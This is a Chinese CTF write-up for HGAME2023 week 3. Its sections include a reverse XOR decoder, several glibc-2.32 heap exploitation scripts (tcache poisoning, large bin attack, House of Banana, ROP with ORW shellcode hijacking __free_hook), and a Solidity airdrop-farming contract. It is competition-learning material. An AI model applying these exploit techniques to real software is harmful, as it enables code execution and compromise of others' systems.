.text:00000000000013F1 48 83 EC 30                   sub     rsp, 30h
.text:00000000000013F5 89 7D DC                      mov     [rbp+var_24], edi
.text:00000000000013F8 48 89 75 D0                   mov     [rbp+var_30], rsi
.text:00000000000013FC 64 48 8B 04 25 28 00 00 00    mov     rax, fs:28h
.text:0000000000001405 48 89 45 F8                   mov     [rbp+var_8], rax
.text:0000000000001409 31 C0                         xor     eax, eax
.text:000000000000140B 8B 45 DC                      mov     eax, [rbp+var_24]
.text:000000000000140E 89 05 14 2C 00 00             mov     cs:dword_4028, eax
.text:0000000000001414 48 8B 45 D0                   mov     rax, [rbp+var_30]
.text:0000000000001418 48 89 05 01 2C 00 00          mov     cs:qword_4020, rax
.text:000000000000141F 48 8D 7D E0                   lea     rdi, [rbp+s]                    ; s
.text:0000000000001423 BE 18 00 00 00                mov     esi, 18h                        ; n
.text:0000000000001428                               db      2Eh                             ; stream
.text:0000000000001428 2E 48 8B 15 E0 2B 00 00       mov     rdx, stdin
.text:0000000000001430 90                            nop
.text:0000000000001431 90                            nop
.text:0000000000001432 90                            nop
.text:0000000000001433 E8 08 FE FF FF                call    _fgets
.text:0000000000001433
.text:0000000000001438 48 8D 7D E0                   lea     rdi, [rbp+s]                    ; s
.text:000000000000143C E8 7F FD FF FF                call    _puts
.text:000000000000143C
.text:0000000000001441 B8 00 00 00 00                mov     eax, 0
.text:0000000000001446 48 8B 55 F8                   mov     rdx, [rbp+var_8]
.text:000000000000144A 64 48 33 14 25 28 00 00 00    xor     rdx, fs:28h
.text:0000000000001453 74 05                         jz      short locret_145A
.text:0000000000001453
.text:0000000000001455 E8 86 FD FF FF                call    ___stack_chk_fail
.text:0000000000001455
.text:000000000000145A                               ; ---------------------------------------------------------------------------
.text:000000000000145A
.text:000000000000145A                               locret_145A:                            ; CODE XREF: main+6A↑j
.text:000000000000145A C9                            leave
.text:000000000000145B C3                            retn
.text:000000000000145B                               ; } // starts at 13E9
.text:000000000000145B
.text:000000000000145B                               main endp

cpp

动调,跟着几个虚函数看一下,发现一处在异或,一处在比较(长度和内容)。把加密后的flag和与输入内容异或的key都dump下来,用脚本异或一下就行。注意程序似乎把char合并成了uint32_t,需要考虑端序

1
2
3
4
5
6
7
8
9
10
key=[0x4E, 0xA0, 0x37, 0x40, 0x46, 0x02, 0xDA, 0xFD, 0x21, 0xFA,   0x6E, 0x3C, 0xAF, 0xD9, 0x9C, 0xCF, 0xB9, 0x47, 0x33, 0x67,   0xE0, 0x4E, 0xEC, 0x0D, 0xD1, 0xC4, 0x80, 0x13, 0x32, 0xA9,   0xB2, 0x3A, 0xA7, 0x50, 0x5D, 0x02, 0x82, 0x39, 0x4A, 0x83]
enc=[0x28, 0x50, 0xC1, 0x23, 0x98, 0xA1, 0x41, 0x36, 0x4C, 0x31,   0xCB, 0x52, 0x90, 0xF1, 0xAC, 0xCC, 0x0F, 0x6C, 0x2A, 0x89,   0x7F, 0xDF, 0x11, 0x84, 0x7F, 0xE6, 0xA2, 0xE0, 0x59, 0xC7,   0xC5, 0x46, 0x5D, 0x29, 0x38, 0x93, 0xED, 0x15, 0x7A, 0xFF]
for i in range(0,40,4):
    enc[i],enc[i+1],enc[i+2],enc[i+3]=enc[i+3],enc[i+2],enc[i+1],enc[i]
for i in range(40):
    enc[i]^=key[i]
for i in range(0,40,4):
    enc[i],enc[i+1],enc[i+2],enc[i+3]=enc[i+3],enc[i+2],enc[i+1],enc[i]
for i in range(40):
    print(chr(enc[i]),end='')

pwn

safe_note

Unsorted bin泄露libc base和heap base,Tcache poisoning劫持free hook。注意glibc-2.32中Tcache链表的next指针是PROTECT_PTR,需要异或一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import *
context(arch='amd64',os='linux')
#p=process('./vuln')
p=connect('week-3.hgame.lwsec.cn',31243)
elf=ELF('./vuln')
libc=ELF('./libc.so.6')

def add(idx, size, content=b''):
p.sendlineafter(b'>',b'1')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendlineafter(b'Size: ',str(size).encode())
if content!=b'':
edit(idx,content)

def edit(idx, content=b''):
p.sendlineafter(b'>',b'3')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendafter(b'Content: ',content if content!=b'' else b'a')

def delete(idx):
p.sendlineafter(b'>',b'2')
p.sendlineafter(b'Index: ',str(idx).encode())

def show(idx):
p.sendlineafter(b'>',b'4')
p.sendlineafter(b'Index: ',str(idx).encode())

for i in range(10):
    add(i,0x80)
for i in range(7):
delete(6-i)

delete(8)
edit(8,b'a')
show(8)
libc_base=u64(p.recv(6)+b'\x00\x00')-ord('a')-1981440
edit(8,b'\x00')
info('libc_base:'+hex(libc_base))
libc.address=libc_base

show(6)
heap=u64(p.recv(5)+b'\x00\x00\x00')
info('heap:'+hex(heap))
target=libc.sym['__free_hook']^heap
info('target:'+hex(target))
edit(0,p64(target))
add(10,0x80,b'/bin/sh\x00')
add(11,0x80,p64(libc.sym['system']))
delete(10)

p.interactive()

large_note

Unsorted bin泄露libc base, heap base,large bin attack攻击mp_.tcache_bins,使tcache对大堆块启用,然后tcache poisoning劫持free hook

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *
context(arch='amd64',os='linux')
#p=process('./vuln')
p=connect('week-3.hgame.lwsec.cn',30078)
elf=ELF('./vuln')
libc=ELF('./libc-2.32.so')
ld=ELF('./ld-2.32.so')

def add(idx, size, content=b''):
p.sendlineafter(b'>',b'1')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendlineafter(b'Size: ',str(size).encode())
if content!=b'':
edit(idx,content)

def edit(idx, content=b''):
p.sendlineafter(b'>',b'3')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendafter(b'Content: ',content if content!=b'' else b'a')

def delete(idx):
p.sendlineafter(b'>',b'2')
p.sendlineafter(b'Index: ',str(idx).encode())

def show(idx):
p.sendlineafter(b'>',b'4')
p.sendlineafter(b'Index: ',str(idx).encode())



add(0,0x800)
add(15,0x900)
add(1,0x7f0)
delete(0)
edit(0,b'a')
show(0)
libc_base=u64(p.recv(6)+b'\x00\x00')-ord('a')-1981440
edit(0,b'\x00')

add(2,0x820)
show(0)
fd=u64(p.recv(6)+b'\x00\x00')
info('fd:'+hex(fd))
edit(0,b'a'*16)
show(0)
p.recvuntil(b'a'*16)
heap=u64(p.recv(6)+b'\x00\x00')
edit(0,p64(fd)*2)
info('libc_base:'+hex(libc_base))
libc.address=libc_base
ld.address=libc_base+0x1ec000
tcache_bins=libc_base+0x1e32d0
global_max_fast=libc_base+0x1e6e98
gadget=libc_base+0x14b760
info('heap:'+hex(heap))

edit(0, p64(0)*3+p64(tcache_bins-0x20))
delete(1)

add(3,0x840)
add(4,0x900)
add(5,0x900)
add(15,0x900)
delete(4)
delete(5)
edit(5,p64(((heap>>12)+3)^libc.sym['__free_hook']))
add(6,0x900,b'/bin/sh\x00')
add(7,0x900)
edit(7,p64(libc.sym['system']))
delete(6)
p.interactive()

House of banana也能做,就是比较麻烦(写exp的时候思维有点乱,结构体也没用flat包装,有点丑)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
from pwn import *
context(arch='amd64',os='linux')
#p=process('./vuln')
p=connect('week-3.hgame.lwsec.cn',30801)
elf=ELF('./vuln')
libc=ELF('./libc-2.32.so')
ld=ELF('./ld-2.32.so')

def add(idx, size, content=b''):
p.sendlineafter(b'>',b'1')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendlineafter(b'Size: ',str(size).encode())
if content!=b'':
edit(idx,content)

def edit(idx, content=b''):
p.sendlineafter(b'>',b'3')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendafter(b'Content: ',content if content!=b'' else b'a')

def delete(idx):
p.sendlineafter(b'>',b'2')
p.sendlineafter(b'Index: ',str(idx).encode())

def show(idx):
p.sendlineafter(b'>',b'4')
p.sendlineafter(b'Index: ',str(idx).encode())


add(5,0x900)
add(6,0x500)

delete(5)
delete(6)
add(8,0x500)
add(9,0x800)

add(10,0x900)
add(11,0x500)
delete(10)
delete(11)
add(1,0x500)
add(2,0x7f0)
delete(9)

edit(9,b'a')
show(9)
libc_base=u64(p.recv(6)+b'\x00\x00')-ord('a')-1981440
edit(9,b'\x00')

add(3,0x810)
show(9)
fd=u64(p.recv(6)+b'\x00\x00')
edit(9,b'a'*16)
show(9)
p.recvuntil(b'a'*16)
heap=u64(p.recv(6)+b'\x00\x00')+1296+2064+16
edit(9,p64(fd)*2)
info('libc_base:'+hex(libc_base))
libc.address=libc_base
ld.address=libc_base+0x1ec000
_rtld_global=ld.sym['_rtld_global']
info('_rtld_global:'+hex(_rtld_global))
one_gadget=libc_base+0xdf54c
edit(9, p64(0)*3+p64(_rtld_global-0x20))
delete(2)
add(4,0x860)
payload=b'\x00'*0x500+p64(heap+0x32*8)+p64(0)
edit(10,payload)
payload=p64(0)+p64(heap+2*8)+p64(0)+p64(heap-16)+p64(0)+p64(heap+3*8)+p64(heap+8*8)+p64(heap+2*8)+p64(heap+3*8)+p64(0)*4+p64(heap+8*8)+p64(0)*18+p64(heap+0x30*8)+p64(0)+p64(heap+0x23*8)+p64(0)+p64(8)+p64(0)*11+p64(0x1a)+p64(0)+p64(one_gadget)+p64(0)*46+p64(0x800000000)
edit(2,payload)

p.interactive()

note_context

前面和上道题类似,不过因为ban了execve,要用orw,劫持free hook的时候换为一个舒服的gadget,虽然题目意思是用setcontext那个,不过我还是更喜欢栈迁移后ROP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
from pwn import *
context(arch='amd64',os='linux')
#p=process('./vuln')
p=connect('week-3.hgame.lwsec.cn',32568)
elf=ELF('./vuln')
libc=ELF('./libc-2.32.so')
ld=ELF('./ld-2.32.so')

def add(idx, size, content=b''):
p.sendlineafter(b'>',b'1')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendlineafter(b'Size: ',str(size).encode())
if content!=b'':
edit(idx,content)

def edit(idx, content=b''):
p.sendlineafter(b'>',b'3')
p.sendlineafter(b'Index: ',str(idx).encode())
p.sendafter(b'Content: ',content if content!=b'' else b'a')

def delete(idx):
p.sendlineafter(b'>',b'2')
p.sendlineafter(b'Index: ',str(idx).encode())

def show(idx):
p.sendlineafter(b'>',b'4')
p.sendlineafter(b'Index: ',str(idx).encode())



add(0,0x800)
add(15,0x900)
add(1,0x7f0)
delete(0)
edit(0,b'a')
show(0)
libc_base=u64(p.recv(6)+b'\x00\x00')-ord('a')-1981440
edit(0,b'\x00')

add(2,0x820)
show(0)
fd=u64(p.recv(6)+b'\x00\x00')
info('fd:'+hex(fd))
edit(0,b'a'*16)
show(0)
p.recvuntil(b'a'*16)
heap=u64(p.recv(6)+b'\x00\x00')+12992
heap_base=heap-0x3550
edit(0,p64(fd)*2)
info('libc_base:'+hex(libc_base))
libc.address=libc_base
ld.address=libc_base+0x1ec000
tcache_bins=libc_base+0x1e32d0
global_max_fast=libc_base+0x1e6e98

info('heap:'+hex(heap))

edit(0, p64(0)*3+p64(tcache_bins-0x20))
delete(1)

add(3,0x840)
add(4,0x900)
add(5,0x900)
add(15,0x900)
delete(4)
delete(5)
edit(5,p64((heap>>12)^libc.sym['__free_hook']))

pop_rdi=libc_base+0x2858f
pop_rsi=libc_base+0x2ac3f
pop_rdx_r12=libc_base+0x114161
leave_ret=libc_base+0x5591c
pop_rbx_r12_r13_r14=libc_base+0x10ab60
roppayload=p64(pop_rdi)+p64(heap_base)+p64(pop_rsi)+p64(0x8000)+p64(pop_rdx_r12)+p64(7)+p64(0)+p64(libc.sym['mprotect'])+p64(heap+0x200)
orw=b'\xb8flagPH\x89\xe71\xf61\xc0\x04\x02\x0f\x05\x89\xc7H\x89\xe6f\xb8\x01\x011\xd2f\x89\xc2f\x01\xc61\xc0\x0f\x051\xfff\xff\xc7f\xff\xc71\xc0\xfe\xc0\x0f\x05'
payload=flat({
0x48:p64(heap+0x100),
0x108:p64(pop_rbx_r12_r13_r14),
0x118:p64(heap),
0x28:p64(leave_ret),
0x130:roppayload,
0x200:orw
})
gadget1=libc_base+0x14b760
'''
mov     rdx, [rdi+8]
mov     [rsp+0C8h+var_C8], rax
call    qword ptr [rdx+20h]
'''
gadget2=libc_base+0x14e72a
'''
mov     rbp, [rdi+48h]
mov     rax, [rbp+18h]
lea     r13, [rbp+10h]
mov     dword ptr [rbp+10h], 0
mov     rdi, r13
call    qword ptr [rax+28h]
'''
add(6,0x900)
add(7,0x900,p64(gadget2))
edit(5,payload)
delete(5)
p.interactive()

misc

Tunnel

非预期,直接strings里面就有flag

blockchain

薅羊毛攻击,绕isEOA判断直接把攻击代码写在constructor里,照抄ctf-wiki上的攻击合约就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
contract Hacker {
    address _addr;

    constructor() payable{
        _addr=0x446e3fE78ce4be732d25124c34aF0A8176eff4E2;
    }

    function attack_airdrop (int num) external{
        for (int i=0;i<num;i++){
            new middle_attack(_addr,address(this));
        }
    }

    function get_flag() external{
        VidarToken target = VidarToken(_addr);
        target.solve();
    }


}


contract middle_attack{
    constructor(address target_addr, address contract_addr){
        VidarToken target = VidarToken(target_addr);
        target.airdrop();
        target.transfer(contract_addr,10);
    }
}

iot

another UNO

hex2bin后直接用ida逆,选avr series,atmega323_l,发现程序0x3d6位置似乎有digitalWrite的操作,将参数视作二进制得到flag的后面部分1s_Fun},前面实在逆不出了找了块arduino uno把程序烧进去了,9600波特率串口输出了中间部分的ascii码rduino_,前面hgame{A是猜的((

]]> HGAME2023 week3 writeup by 没有头猪